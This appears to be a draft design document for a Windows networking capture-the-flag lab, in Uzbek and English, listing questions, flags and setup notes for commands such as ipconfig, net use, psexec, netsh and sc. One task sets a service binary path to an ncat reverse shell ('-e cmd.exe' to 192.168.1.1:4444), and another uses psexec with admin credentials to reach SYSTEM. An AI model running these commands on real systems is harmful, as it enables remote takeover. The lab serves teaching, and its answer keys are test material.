Share
Explore
Ctf Senary Red-0
12. Windows Networking and Services
Keluvchi mashqalar RDP bilan bog`lanib keyin bajarilishi lozim!
Keluvchi services’lar machine yoqilganda ishga tushishi kerak!
12.1.2
1
What ipconfig parameter displays the help menu?
Qaysi ipconfig parametri yordam menyusini ko‘rsatadi?
javob: /?
Senary
2
What ipconfig parameter will discard the IPv4 address of an adapter?
Qaysi ipconfig parametri adapterning IPv4 manzilini bekor qiladi?
javob: /release
Senary
3
Using systeminfo, provide the OS version (to include Build number) of the exercise host.
systeminfo yordamida mashq kompyuterining operatsion tizim versiyasini (Build raqamini ham qo‘shgan holda) taqdim eting.
javob: 10.0.17763 N/A Build 17763
Senary
4
Create a permanent environment variable named LOOKHERETOEXECUTE given the value of \\users\\blue\\executeme.exe. (Run the command prompt as Administrator). The flag can then be found in the C:\Users\offensive\ directory.
Doimiy muhit o’zgaruvchisini yaratish uchun, LOOKHERETOEXECUTE nomli va \users\blue\executeme.exe qiymatiga ega bo’lsin. (Buyruq qatorini ma'mur(admin) sifatida ishga tushiring). Keyin bayroqni *C:\Users\offensive* katalogida topishingiz mumkin.
Hint: Har safar `\\` ishlatiladi.
Biz **setx /m** buyrug'idan foydalanishimiz kerak.
**setx** buyruqining **/m** parametri haqida ma'lumotni ko'rib chiqing.
**set** va **setx** orasidagi farqlarni tushuntiruvchi ma'lumot bo'limini toping.
Har safar ikkita `\\` ishlatiladi.
Biz **setx /m** buyrug'idan foydalanishimiz kerak.
**setx** buyruqining **/m** parametri haqida ma'lumotni ko'rib chiqing.
**set** va **setx** orasidagi farqlarni tushuntiruvchi ma'lumot bo'limini toping.
Javob: SETX{Ilova_Binar_Faylni_Bu_Yerda_Qidiradi}
Senary
O`quvchi doimiy environment qo`shganda C:\Users\offensive directory’da envVar_flag1.txt file ochilishi kerak. Unda use SETX{Ilova_Binar_Faylni_Bu_Yerda_Qidiradi} malumoti bo`ladi.
Bu directory ichida quyidagi fayllar mavjud bo`lishi lozim:
5
What is the command we would run to view an environment variable starting with the letter "U"?
"U harfi bilan boshlanadigan muhit o'zgaruvchisini ko'rish uchun qaysi buyruqni ishlatamiz?"
javob: set u
Senary
12.1.3
1
What ipconfig parameter displays the help menu?
Qaysi ipconfig parametri yordam menyusini ko‘rsatadi?
javob: /?
Senary
2
What ipconfig parameter will discard the IPv4 address of an adapter?
Qaysi ipconfig parametri adapterning IPv4 manzilini bekor qiladi?
javob: /release
Senary
3
Using systeminfo, provide the OS version (to include Build number) of the exercise host.
systeminfo yordamida mashq kompyuterining operatsion tizim versiyasini (Build raqamini ham qo‘shgan holda) taqdim eting.
javob: 10.0.17763 N/A Build 17763
Senary
Foydalanuvchi systeminfo dasturini ishlatganda OS Version haqida ham malumot berishi kerak.
4
Create a permanent environment variable named LOOKHERETOEXECUTE given the value of \\users\\blue\\executeme.exe. (Run the command prompt as Administrator). The flag can then be found in the C:\Users\offensive\ directory.
Doimiy muhit o’zgaruvchisini yaratish uchun, LOOKHERETOEXECUTE nomli va \users\blue\executeme.exe qiymatiga ega bo’lsin. (Buyruq qatorini ma'mur(admin) sifatida ishga tushiring). Keyin bayroqni *C:\Users\HaadOne* katalogida topishingiz mumkin.
Hint: Har safar `\\` ishlatiladi.
Biz **setx /m** buyrug'idan foydalanishimiz kerak.
**setx** buyruqining **/m** parametri haqida ma'lumotni ko'rib chiqing.
**set** va **setx** orasidagi farqlarni tushuntiruvchi ma'lumot bo'limini toping.
Har safar ikkita `\\` ishlatiladi.
Biz **setx /m** buyrug'idan foydalanishimiz kerak.
**setx** buyruqining **/m** parametri haqida ma'lumotni ko'rib chiqing.
**set** va **setx** orasidagi farqlarni tushuntiruvchi ma'lumot bo'limini toping.
Javob: SETX{Ilova_Binar_Faylni_Bu_Yerda_Qidiradi}
Senary
O`quvchi doimiy environment qo`shganda C:\Users\offensive directory’da envVar_flag1.txt file ochilishi kerak. Unda use SETX{Ilova_Binar_Faylni_Bu_Yerda_Qidiradi} malumoti bo`ladi.
Bu directory ichida quyidagi fayllar mavjud bo`lishi lozim:
5
What is the command we would run to view an environment variable starting with the letter "U"?
"U harfi bilan boshlanadigan muhit o'zgaruvchisini ko'rish uchun qaysi buyruqni ishlatamiz?"
javob: set u
Senary
12.1.4
1
Which netstat parameter displays active connections by protocol? (you need the dash)
"Qaysi netstat parametri faol ulanishlarni protokol bo'yicha ko'rsatadi? (chiziqcha ishlatishingiz kerak)"
javob: -p
Senary
2
Which netstat parameter displays active connections and PID associated with the connections? (you need the dash)
"Qaysi netstat parametri faol ulanishlarni va ulanishlarga bog‘liq bo‘lgan PID'ni ko‘rsatadi? (chiziqcha ishlatishingiz kerak)"
hint: "-a parametri faqat faol ulanishlarni emas, balki barcha ulanishlarni ko‘rsatadi."
javob: -o
Senary
3
What is the mac address associated with ip address 1.3.3.7? (Provide answer in XX:XX:XX:XX:XX:XX format.)
"1.3.3.7 IP manziliga bog‘langan MAC manzili qanday? (Javobni XX:XX:XX:XX:XX:XX formatida bering.)"
javob: de-ad-b3-3f-4d-ad
Senary
Foydalanuvchi arp -a buyrug`ini ishlatganda, Address Resolution Protocol (ARP) cache’ni ko`rsatadi. Ularni orasida 1.3.3.7 IP’ga biriktirilgan MAC address’ni ko`rsatadi
Foydalanuvchi javobni XX:XX:XX:XX:XX:XX formatda kiritishi kerak
12.1.5
1
What is the full command to ping www.offsec.com with 10 Echo Request messages instead of the default 4?
" saytini odatiy 4 ta emas, balki 10 ta Echo Request xabari bilan ping qilish uchun to‘liq buyruq qanday bo‘ladi?)"
javob: ping -n 10 www.haadyvip.com
Senary
2
Using ping, resolve the address: www.networking4Windows.com and provide the IP address.
"ping yordamida www.networking4Windows.com manzilini aniqlang va uning IP manzilini bering."
javob: ?
Senary
Agar foydalanuvchi website’ga ICMP packetini (ping) jo`natganda, IP address qaytarishi kerak. Server’da shu domain’ga oddiy bir website ishlab tursa bo`ladi. Masalan ping qaytaradigan javob:
Bu yerda IP 35.214.215.106
3
What is the pathping parameter that prevents it from resolving ip addresses of routers along the path?
"pathping buyrug‘ining qaysi parametri yo‘l(path) bo‘ylab joylashgan routerlarning IP manzillarini aniqlashni to‘xtatadi?"
javob: -n
Senary
4
What is the tracert parameter that prevents it from resolving ip addresses of routers along the path?
"tracert buyrug‘ining qaysi parametri yo‘l bo‘ylab joylashgan routerlarning IP manzillarini aniqlashni to‘xtatadi?"
Javob: -d
Senary
5
View the persistent route of 1.1.1.1/32 and annotate the network gateway. You will need it for the next question. For this question, remove 1.1.1.1 route and the flag will be in the c:\Users\offensive\ directory. (Run the command prompt as Administrator)
"1.1.1.1/32 doimiy yo'lini ko‘ring va tarmoq o'tish yo'li(gateway)ni belgilab o‘ting. Bu keyingi savol uchun kerak bo‘ladi. Ushbu savol uchun 1.1.1.1 manzilini olib tashlang, va bayroqni *c:\Users\offensive* katalogida topishingiz mumkin. (Buyruq qatorini ma'mur sifatida ishga tushiring)"
hint:
javob: ROUTE{Yo'nalish_o‘chirildi}
Senary
Foydalanuvchi 1.1.1.1 IP’sini route’dan o`chirib tashlasa c:\Users\offensive\ directory’ga route_flag1.txt paydo bo`lishi kerak.
Rasm 1
route'dan ochirish natijasi
Foydalanuvchi file’ni o`qigandan so`ng, flag beriladi.
6
Add a persistent route of 1.1.1.2/32 and the default gateway from question 5, and the flag will be in the c:\Users\offensive\ directory. (Run the command prompt as Administrator)
"1.1.1.2/32 uchun doimiy yo'lni va 5-savoldagi odatiy gatewayni qo‘shing, va bayroqni *c:\Users\offensive* katalogida topishingiz mumkin. (Buyruq qatorini ma'mur sifatida ishga tushiring)"
javob: ROUTE{Yo'nalish_qo'shildi}
Senary
Foydalanuvchi route table’ga 1.1.1.2 IP’sini qo`shgandan so`ng flag c:\Users\offensive directory ishida route_flag2.txt file’da bo`ladi.
Route'ga qo`shilgan natija
So`ngra foydalanuvchi dir qiladi. Keyin, flag’ni type qilib o`qiydi
12.1.6
1
Which nbtstat parameter displays contents of the name cache, to include the table of names and IP addresses.
"nbtstat buyrug‘ining qaysi parametri nomlar keshining mazmunini, jumladan, nomlar va IP manzillar jadvalini ko‘rsatadi?"
javob: -s
Senary
2
The command nslookup has two primary modes. Provide one of them.
"nslookup buyrug‘ining ikkita asosiy rejimi mavjud. Ulardan birini aytib bering."
javob: Interactive
Senary
3
Use nslookup to find the IP address of www.megacorpone.com.
"nslookup yordamida www.megacorpone.com saytining IP manzilini aniqlang."
javob: ?
View the persistent route of 1.1.1.1/32 and annotate the network gateway. You will need it for the next question. For this question, remove 1.1.1.1 route and the flag will be in the c:\Users\offensive\ directory. (Run the command prompt as Administrator)
"1.1.1.1/32 doimiy yo'lini ko‘ring va tarmoq o'tish yo'li(gateway)ni belgilab o‘ting. Bu keyingi savol uchun kerak bo‘ladi. Ushbu savol uchun 1.1.1.1 manzilini olib tashlang, va bayroqni *c:\Users\offensive* katalogida topishingiz mumkin. (Buyruq qatorini ma'mur sifatida ishga tushiring)"
hint:
javob: ?
Senary
website’ga o`qshagan server qurish lozim. U oldingi bo`limlarda ishlatilingan
12.2.1
1
Share the system32 folder with a share name of "mySharedData" and the flag will be in the c:\Users\offensive\ directory. May take a 10-15 seconds for the flag to appear. (Run the command prompt as Administrator)
"system32 jildini mySharedData nomi bilan ulashing, va bayroqni *c:\Users\offensive* katalogida topishingiz mumkin. Bayroq paydo bo‘lishi uchun 10-15 soniya vaqt ketishi mumkin. (Buyruq qatorini ma'mur sifatida ishga tushiring)"
Hint: net share mySharedData
net share buyrug‘i bo‘limiga murojaat qiling.
javob: SHARE{Ulashish_Yaxshilikdir}
Senary
Agar foydalanuvchi mySharedData nomli drive bo`lishsa (share qilsa) flag c:\Users\offensive directory ichiga shareFlag1.txt file ichida bo`ladi.
Share myShareData
Result
2
Assign the F drive to a shared folder named finance located on \\finance.outofthisworld.com\finance with the user finance. The flag will be in the c:\Users\offensive\ directory.
NOTE: Command must be run as the offensive user. May take a 10-15 seconds for the flag to appear.
"F diskini \finance.outofthisworld.com\finance manzilida joylashgan finance nomli umumiy jildga ulab, foydalanuvchini finance qilib belgilang. Bayroqni *c:\Users\offensive* katalogida topishingiz mumkin.
ESLATMA: Buyruqni offensive foydalanuvchisi sifatida ishga tushirish kerak. Bayroq paydo bo‘lishi uchun 10-15 soniya vaqt ketishi mumkin."
Hint: "Bu qisman buyruq: net use f: \finance.outofthisworld.com\finance. Qolgan qismi nima?
net use buyrug‘i bo‘limini ko‘rib chiqing."
Javob: SHARE{Ma’lumotni_Boshqa_Ulashish_Diskiga_Yo‘naltirish}
Senary
Agarda foydalnuvchi finance folder’ni o`ziga tayinlab olsa, flag c:\Users\offensive folder’da paydo bo`lishi kerak.
Qanday: Bu yerda dastur bo`ladi, u dastur tez-tez ishga tuhsib turadi. Agar foydalanuvchi folder qo`shgab bo`lsa, flag’ni beradi.
domain’da server bo`lsihi kerak.
3
Assign the G drive to a shared folder named marketing located on \\marketing.outofthisworld.com\ with the user and password of "marketing" and make the connection constant, meaning it will reconnect if you restart your machine.
NOTE: Command must be run as the offensive user. You may need to wait up to 60 seconds for the flag to appear in the directory of the offensive user.
"G diskini \marketing.outofthisworld.com\ manzilida joylashgan marketing nomli umumiy jildga ulab, foydalanuvchi va parolni marketing qilib belgilang va ulanishni doimiy qiling, ya'ni kompyuterni qayta ishga tushirganingizda ulanish qayta tiklanadi.
ESLATMA: Buyruqni offensive foydalanuvchisi sifatida ishga tushirish kerak. Bayroq offensive foydalanuvchining katalogida paydo bo‘lishi uchun 60 soniyagacha kutishingiz mumkin."
Hint: "net use g: marketing /user:marketing /persistent:yes
Qaysi parametr ulanishni doimiy qiladi?"
Javob: SHARE{Ishga_Tushishda_Ulashish}
Senary
Agarda foydalnuvchi marketinng folder’ni o`ziga tayinlab olsa, flag c:\Users\offensive folder’da paydo bo`lishi kerak.
Qanday: Bu yerda dastur bo`ladi, u dastur tez-tez ishga tuhsib turadi. Agar foydalanuvchi folder’ni doimiy qilib qo`shgab bo`lsa, flag’ni beradi.
marketing.outofthisworld.com domain’da server bo`lsihi kerak.
12.2.2
1
There is a service running on port 4444. Using netcat, connect to the exercise host. Once connected, press enter twice to reveal the flag.
"4444-portda ishlayotgan xizmat mavjud. netcat yordamida mashq serveriga ulaning. Ulanganingizdan so'ng, bayroqni ko'rish uchun ikki marta Enter tugmasini bosing."
javob: WIN-NC{Ajoyib_Ulanish!}
Senary
Machine’da (foydalanuvchi ishlatayotgan host) service 4444 port’da ishlayogan bo`ladi. Agar foydalanuvchi bu port’ga ulansa flag qaytariladi.
2
From the exercise host, start a netcat listener on port 5555 to get the flag.
"Mashq serveridan netcat tinglovchisini 5555-portda ishga tushiring va bayroqni oling."
Hint: "Sizga shunchaki tinglovchi(listener) kerak."
Javob: WIN-NC{Yuklama_Yuborildi!}
Senary
Machine’da (foydalanuvchi ishlatayotgan host) client ocat dasturi bo`ladi. U tez-tez 5555 portiga bog`lanish qilib turadi. Agarda bog`lanish fail (muvaffaqiyatsiz bo`lsa) javob qaytarilaydi, aksincha flag user’ga qaytariladi
3
Which socat option allows other sockets to bind to an address even if parts of it are already in use?
"socat buyrug‘ining qaysi opsiyasi boshqa socketlarga manzilga ulanishga ruxsat beradi, hatto uning ba'zi qismlari allaqachon ishlatilayotgan bo‘lsa ham?"
hint: bind to an address iborasini qidiring.
https://linux.die.net/man/1/socat"
Javob: CWreuseaddr
Senary
4
What CHILD option group does the following description define?
After establishing a connection, handles its channel in a child process and keeps the parent process attempting to produce more connections, either by listening or by connecting in a loop (example). SSL-CONNECT and SSL-LISTEN differ in when they actually fork off the child: SSL-LISTEN forks before the SSL handshake, while SSL-CONNECT forks afterwards. RETRY and FOREVER options are not inherited by the child process.
"Quyidagi ta'rif qaysi CHILD opsiyalar guruhini belgilaydi?
Ulanish o‘rnatilgandan so‘ng, kanalni biror bir bola(child) jarayoni orqali boshqaradi va ota jarayonni ko‘proq ulanishlarni yaratishga harakat qilishda davom ettiradi, bu esa yoki tinglash yoki aylanish orqali ulanishni ta’minlaydi (misol). SSL-CONNECT va SSL-LISTEN bola jarayonini qachon ajratishida farq qiladi: SSL-LISTEN SSL qo‘l siqishidan oldin ajratadi, SSL-CONNECT esa undan keyin ajratadi. RETRY va FOREVER opsiyalari bola jarayoni tomonidan meros qilib olinmaydi."
Javob: CWfork
Senary
12.2.3
1
Using psexec, read the contents of "psexec-flag1.txt" located in the c:\Users\administrator\Desktop location. The ip address is 192.168.54.100, the username is "administrator" and the password is "remoteadmin". (Run the command prompt as Administrator)
"psexec yordamida c:\Users\administrator\Desktop manzilida joylashgan psexec-flag1.txt faylining mazmunini o‘qing. IP manzil: 192.168.54.100, foydalanuvchi nomi: administrator, va parol: remoteadmin. (Buyruq qatorini ma'mur sifatida ishga tushiring)"
Hint: "Mana boshlanishi: psexec -i \ip -u administrator -p remoteadmin"
javob: PSEXEC{Uzoqdan_O‘qish — Oson!}
Senary
Alohida 192.168.54.100‘da windows machine ishlashi kerak. Unda Administrator foydalanuvchisining Desktop’da psex_flag1.txt file ichida flag bo`ladi. Foydalanuvchi bu machine’ga PsExec-dan foydalanish uchun target’ning (192.168.54.100) tizimda bir nechta port va xizmatlar yoqilgan bo'lishi kerak!.
2
Using psexec, read the contents of "psexec-flag2.txt" located in the c:\Users\administrator\Desktop location. The ip address is 192.168.54.100, the username is "administrator" and the password is "remoteadmin". Note: to read this file, you will have to run it with System privileges.
"psexec yordamida c:\Users\administrator\Desktop manzilida joylashgan psexec-flag2.txt faylining mazmunini o‘qing. IP manzil: 192.168.54.100, foydalanuvchi nomi: administrator, va parol: remoteadmin.
Eslatma: Ushbu faylni o‘qish uchun tizim(system) huquqlari bilan ishga tushirishingiz kerak."
Hint: Bu sizga boshlashga yordam beradi: psexec -i -s \\ip -u administrator -p remoteadmin /c
Javob: PSEXEC{Uzoqdan_Tizim_Fayllarini_O‘qish — Muammo_Emas!}
Senary
Alohida 192.168.54.100‘da windows machine ishlashi kerak. Unda Administrator foydalanuvchisining Desktop’da psex_flag2.txt file ichida flag bo`ladi. Bu fayl yuqori huquqlar bilan o`qilishi kerak. Foydalanuvchi bu machine’ga PsExec-dan foydalanish uchun target’ning (192.168.54.100) tizimda bir nechta port va xizmatlar yoqilgan bo'lishi kerak!.
12.3.1
1
Enable the firewall for all profiles to get the flag.
Barcha profil uchun faeruolni yoqing va bayroqni oling.
Hint: Menimcha, siz "state on" ni izlayapsiz.
Javob: WIN-FW{Devor_Tiklandi}
senary
Machine’da bir dastur bo`lishi kerak. U dastur foydalanuvchi firewall state on qilgan taqdirda flag’ni c:\Users\administrator\Desktop shu yerga defenderflag1.txt flag yoziladi
2
Add a firewall rule named "Allow SSH", direction in, action is allowed, local port is 22, and the protocol is TCP to get the flag.
"Allow SSH" nomli faeruol qoidasi qo‘shing: yo‘nalishi - kiruvchi, amal - ruxsat berilgan, mahalliy port - 22, protokol - TCP, va bayroqni oling.
hint: Qolgani sizga endi ma'lum bo'lishi kerak: `netsh advfirewall firewall add rule`
javob: WIN-FW{SSH_Uchun_Hammasi_Tayyor!}
Senary
Machine’da dastur bo`ladi. U foydalanuvchi firewall qo`shsa flag’ni c:\Users\administrator\Desktop\defenderflag2.txt file’da paydo bo`ladi.
Firewall qoida nomi: Allow SSH
3
Restore the firewall settings to default, and backup the current policy to c drive with the name of "firewallPolicy.wfw" to get the flag.
Faeruol sozlamalarini standart holatga qaytaring va joriy siyosatni "firewallPolicy.wfw" nomi bilan C diskiga zaxira qilib saqlang, so‘ng bayroqni oling.
hint: Buni bitta yoki ikkita buyruq sifatida bajarishingiz mumkin.
Javob: WIN-FW{Asliga_Qaytish}
Senary
Machine’da dastur bo`ladi. U dastur firewall default configuration xolatida bo`lsa va C:\firewallPolicy.wfw ‘da shu firewall configuration bo`lsa flagni c:\Users\administrator\Desktop\defenderflag3.txt payda bo`ladi. Firewall reset qilingan bo`lishi zarur!
12.3.2
Haadda 12.3.2. ni qismini ochmadi qandaydir error chiqdi manimcha bunga bog'liq (Bobur va Temurdan ham so'rash kerak shu qism o'zi mavjudmi )
12.4.2
1
Using the tasklist command, filter the results to the service named dhcp. What is the image name associated with that service?
tasklist buyrug‘idan foydalanib, natijalarni dhcp nomli xizmatga filtrlang. Ushbu xizmat bilan bog‘liq bo‘lgan tasvir nomi nima?
Senary
Machida DHCP sozlanishi kerak,va uni servise ostida yurgazish lozim
Foydalanuvchi buni buyrug`i ⬇️ bilan topadi.
2
Find the active service that contains a flag in the name. Provide the flag.
Nomida bayroq (flag) mavjud bo‘lgan faol xizmatni toping. Bayroqni taqdim eting.
javob: WIN-SERVICE{Zo‘r_Protsess!}
senary
Tizimda hech qanday narsa qilmaydigan servise bo`ladi. Uni nomi WIN-SERVICE{What_A_Proces} bo`ladi. uni hech narsa qilmaydigan dasturga (.exe) bog`lab qo`yiladi.
3
Find the process that has a service named "somethingSomethingSomething" associated with it. Provide the image name as the flag.
"somethingSomethingSomething" nomli xizmat bilan bog‘liq jarayonni toping. Tasvir nomini bayroq sifatida taqdim eting.
Javob: Darkside.exe
Senary
Tizimda Darkside.exe digan dastur somethingSomethingSomething nomi bilan ishga tushirilib qo`yiladi
12.4.3
1
Using net start "servicex" to get the flag.
Bayroqni olish uchun net start "servicex" buyrug‘idan foydalaning.
Javob: WIN-SERVICES{Meni_Hech_Kim_To‘xtata_Olmaydi!}
Senary
Machine’da servisex digan service bo`ladi. U ishga tushganda C:\User\offensive\Sevices_flag1.txt file’ga flag’ni yozadi.
Starting the service
Taking flag
2
Using net sc stop "servicey" to get the flag.
Bayroqni olish uchun net stop "servicey" buyrug‘idan foydalaning.
javob: WIN-SERVICES{Hech_Kim_To‘xtatolmaydi!}
senary
Machine’da servicey degan dastur ishlab turgan bo`ladi. Agar uni to`xtatilinsa, flag C:\User\offensive\Sevices_flag2.txt’da paydo bo`ladi!
Stopping the service!
Taking the flag!
3
Using sc, change the Start_Type of DHCP service from Auto to Disabled to get the flag.
Bayroqni olish uchun sc yordamida DHCP xizmatining Start_Type sozlamasini Autodan Disabledga o‘zgartiring.
Javob: WIN-SERVICES{Avtomatik_Boshlanishni_Ta’qiqlash}
Senary
Machine’da dhcp service bo`ladi. U machine yoqilganda automatic ishga tushadigan bo`ladi. Uni automatic’dan disabled’ga o`tgazganda, flag’ni C:\User\offensive\Sevices_flag3.txt shu yerga keladi.
4
Using sc, change the Binary_Path_Name of DHCP service to "ncat.exe 192.168.1.1 4444 -e cmd.exe" to get the flag.
Bayroqni olish uchun sc yordamida DHCP xizmatining Binary_Path_Name sozlamasini "ncat.exe 192.168.1.1 4444 -e cmd.exe" ga o‘zgartiring.
javob: WIN-SERVICES{Xizmatlar_Endi_Mening_Qo‘limda!}
senary
Machine’da dhcp service bo`ladi. Foydalanuvchi uning running path’ini o`zgartirsa, (ncat.exe 192.168.1.1 444 -e cmd.exe), flag C:\User\offensive\Sevices_flag4.txt paydo bo`ladi.
Changing the path of DHCP
5
Using PsService, change the Start Type configuration of "SNMPTRAP" to Auto to get flag.
Bayroqni olish uchun PsService yordamida "SNMPTRAP" xizmatining Start Type sozlamasini Autoga o‘zgartiring.
javob: WIN-SERVICES{Avtomatik_Ravishda_Yo‘lga_Qo‘y_Meni!}
senary
Machine’da SNMPTRAP service bo`ladi va uning start type demand_start bo`ladi. Agar foydalanuvchi uni automatic qilsa, unga flag berilad. Flag C:\User\offensive\psservice_flag1.txt file’da bo`ladi
12.4.4; LOOK
1
Create a RDP file with the computer IP address of 192.168.1.1, and the username of Administrator. Save the file (the default location is fine). This file is considered a system file and is hidden. You will need to research how to unhide system files, right click and go into its properties, and provide the size of the file. What is the KB size of the file? (in the format x.xx)
192.168.1.1 IP manzili va foydalanuvchi nomi Administrator bo‘lgan RDP fayl yarating. Faylni saqlang (standart joylashuv mos keladi). Ushbu fayl tizim fayli sifatida ko‘rib chiqiladi va yashirin bo‘ladi. Tizim fayllarini qanday qilib ko‘rinadigan qilishni o‘rganishingiz, faylga o‘ng tugmachani bosib, uning xususiyatlariga kirishingiz va fayl hajmini aniqlashingiz kerak bo‘ladi. Fayl hajmi qancha KB? (x.xx formatida).
Javob: 2.23
Senary
Videoda ishlay olmagan ekan shu joyini
1. RDP dan berilgan 192.168.1.1 IP manzilga Administratorga ulanish uchun fayl yaratishitishi kerak YAratilgan faylni oozgartirmagan holatda saqlashi kerak yani Default.rdp
2. Saqlangan joyiga borib yaratgan faylini yashirin fayllar ichidan korib uni Size ni korishi kerak
2
With Remote Desktop, you are able to share resources from your local computer with the remote computer. These items include printers, drives, and the clipboard. What is the one item selected when you explore the "More" option of Local devices and resources?.
Remote Desktop orqali siz o‘z mahalliy kompyuteringiz tasarruflarini masofaviy kompyuter bilan ulashishingiz mumkin. Bu narsalar orasida printerlar, disklar va bufer (clipboard) mavjud. "Local devices and resources" bo‘limidagi "More" opsiyasini o‘rganganingizda tanlangan yagona element qaysi?
javob: Smart cards
senary
RDP nastroykasida default shunaqa keladi
3
Of the five tabs of the Remote Desktop Connection, which tab do you find the option to tell the RDP connection to "Reconnect if the connection is dropped"?
Remote Desktop Connection-ning beshta yorlig‘i ichida, RDP ulanishiga "Agar ulanish uzilib qolsa, qayta ulansin" variantini ko‘rsatadigan opsiya qaysi yorliqd a joylashgan?
Javob: Experience
Senary
RDP nastroykasida default shunaqa keladi
12.4.5; Savollari 12.4.4 bilan bir xil
Scenario: You are a technician hired to update customer documentation and troubleshoot networking issues. The customer provides you with a website (www.shimmervault.com) and a /24 IP range of 192.168.20.0.
1
The customer doesn’t know the IP address of their web server. Find and provide the web server’s IP address.
Mijoz o'z veb-serverining IP-manzilini bilmaydi. Veb-serverning IP-manzilini toping va taqdim eting.
Hint: “What do we already know about machine?
Where should we look?
nslookup”
Javob: ?
Senary
Oddiy bitta web server boladi. Unga domain biriktilingan bo`ladi.
Domain:
Foydalanuvchi bu website’ni IP addressini javob qilib kirgazadi.
2
The customer does not know the web server's computer name. Identify the computer name of the Windows machine.
Mijoz veb-serverning kompyuter nomini bilmaydi. Windows mashinasining kompyuter nomini aniqlang.
javob: ?
senary
3
Of the five tabs of the Remote Desktop Connection, which tab do you find the option to tell the RDP connection to "Reconnect if the connection is dropped"?
Remote Desktop Connection-ning beshta yorlig‘idan qaysi birida RDP ulanishiga "Agar ulanish uzilib qolsa, qayta ulansin" deb ko‘rsatadigan opsiyani topishingiz mumkin?
Javob: ?
Senary
12.5.1
1
Scenario: You are a technician hired to update customer documentation and troubleshoot networking issues. The customer provides you with a website (www.shimmervault.com) and a /24 IP range of 192.168.20.0.
The customer doesn't know the IP address of their web server. Find and provide the web server's IP address.
"Vaziyat: Siz mijoz hujjatlarini yangilash va tarmoq muammolarini hal qilish uchun yollangan texnik mutaxassissiz. Mijoz sizga bir veb-sayt (www.shimmervault.com) va 192.168.20.0/24 IP diapazonini taqdim etadi.
Mijoz o‘z veb-serverining IP manzilini bilmaydi. Veb-serverning IP manzilini topib, taqdim eting."
Hint: "Biz mashina haqida nima bilamiz?
Qayerdan izlashimiz kerak?
`nslookup`"
Javob: 192.168.20.20
Senary
1. nslookup komandasi orqali shu manzilni berganda IP manzilini berishi kerak
2
The customer does not know the web server's computer name. Identify the computer name of the Windows machine.
Mijoz veb-serverning kompyuter nomini bilmaydi. Windows mashinasining kompyuter nomini aniqlang.
javob: win-net-prac
senary
1. terminalda hostname komandasini bajarganda aynan shu tizimdagi hostnameni aniqlashi kerak
2. buning haadydagi host nomi shunaqa bolishi kerak
3
Employees share files and messages through a shared resource. Customers have not been able to connect this machine to a shared resource. Mount the remote share called "Quest_share" to the H: drive to find the flag.
Xodimlar fayllar va xabarlarni umumiy manba orqali ulashishadi. Mijozlar ushbu mashinani umumiy manbaga ulay olishmadi. Bayroqni topish uchun "Quest_share" deb nomlangan masofaviy umumiy manbani H: diskiga ulang.
hint: "Ushbu mashinaning IP manzili nima?
`net use`"
Javob: WIN-NET-PRAC{Zaxiradagi_Kaltaquloqlarga_Yordam_Kerak!}
Senary
1. Terminalda net use h:\\192.68.60.63\Quest_share /user:offsec offsec komandasi orqali boglanadi
2. Keyin dir H: komandani bajarganda flag nomli fayl chiqib kelishi kerak
4
The customer is having a tough time starting the "enserv" service. Start the "enserv" service to get the flag. The flag will be in the "offsec" Documents directory.
Mijoz "enserv" xizmatini ishga tushirishda qiyinchilikka duch kelmoqda. Bayroqni olish uchun "enserv" xizmatini ishga tushiring. Bayroq "offsec" hujjatlar katalogida joylashgan bo‘ladi.
Hint: "Qanday qilib xizmatni ishga tushirishimiz mumkin?
`sc vositasi`"
Javob: WIN-NET-PRAC{Enserv_Xizmati_Yo‘lga_Qo‘yildi}
Senary
1. ssh orqali ulangandan keyin enserv xizmatiga ulanishi kerak (net start enserv)
2. xizmatga ulangandan keyin Documents papkasida flag bolishi kerak
5
Connect to the machine using RDP. What is the flag on the desktop background picture?
Mashinaga RDP orqali ulang. Ish stoli fon rasmidagi bayroq nima?
Hint: "Windows Defender Firewall bo‘limiga murojaat qiling va ushbu tushunchani RDP bilan qo‘llang.
`netsh` buyrug‘ini sinab ko‘ring.
Xavfsizlik devori(firewall) qoidalarini tekshiring."
javob: WIN-NET-PRAC{Ekranga_Kirish_Muvaffaqiyatli!}
senary
1. Terminalda Remote Desktop'ning TCP porti orqali kirish qoidalarini yoqish kerak
2. Keyin terminal orqali xfreerdp yoki Windowsda RDP orqali ulanishi kerak
3. Flag fon rasmiga qoyilgan bolishi kerak
6
The customer informed you that an environment variable needs to be extracted. Enumerate the environment variables for the flag.
Mijoz sizga bir muhit o‘zgaruvchisini ajratib olish kerakligini ma'lum qildi. Bayroqni olish uchun muhit o‘zgaruvchilarini tahlil qiling.
Javob: WIN-NET-PRAC{Juda_Ko‘p_O‘zgaruvchi_Bor!}
Senary
1. Bog’langan RDP dan chiqmagan holatda qidiriladi
2. boglangan Windowsda search joyiga environment veriables nomli joyga kiriladi
3. shu oyna ochiladi
4. Flag shu yerda joylashgan bolishi kerak
7
This device might be associated with an internal network on another interface. Find the IP address of the other interface. Provide the IP address as the answer.
Ushbu qurilma boshqa interfeysda ichki tarmoq bilan bog‘liq bo‘lishi mumkin. Boshqa interfeysning IP manzilini toping. IP manzilini javob sifatida taqdim eting.
Javob: 10.10.23.13
Senary
1. Windowsda cmd ochib ipconfig komandasini ishlatganda ichki IP chiqib kelishi kerak
8
The customer needs a text file that is compressed within a zip file. Find the zip file located in c:\Users\offsec\Desktop. Use the skills you learned in this Learning Module to unzip this file and retrieve the flag inside.
Mijozga zip fayli ichida siqilgan matnli fayl kerak. c:\Users\offsec\Desktop joylashgan zip faylni toping. Ushbu o‘quv modulida o‘rgangan ko‘nikmalaringizdan foydalanib, zip faylni oching va ichidagi bayroqni oling.
Javob:WIN-NET-PRAC{Arxivni_Qo‘lga_Kiritding!}
Senary
1. Windowsda Desktop da zip fayl bolishi kerak va ichida flag boladi
2. zip ni tar -xf .\zip-fayl deb ochilishi kerak va flag.txt faylni ochishi kerak
13. Network Scripting
13.1.2 Socket Methods
1.
What socket family will allow us to connect to a system that has an IPv4 Address?
Qaysi socket oilasi IPv4 manziliga ega tizimga ulanish imkonini beradi?
Javob: AF_INET
IPv4 manziliga ega tizimga ulanish imkonini beruvchi socket oilasi AF_INET (Address Family Internet) hisoblanadi.
AF_INET oilasi IPv4 protokolida ishlash uchun mo‘ljallangan va asosan quyidagi turlarda qo‘llanadi:
Masalan, Python tilida IPv4 socket yaratish uchun quyidagicha yoziladi:
Agar IPv6 manzillar bilan ishlash kerak bo‘lsa, AF_INET6 oilasi qo‘llaniladi.
2.
Take a look at the following syntax: s.connect(("127.0.0.1",9090)) . What kind of socket method is the method being invoked here?
A. Client
B. Server
C. Socket
D. General
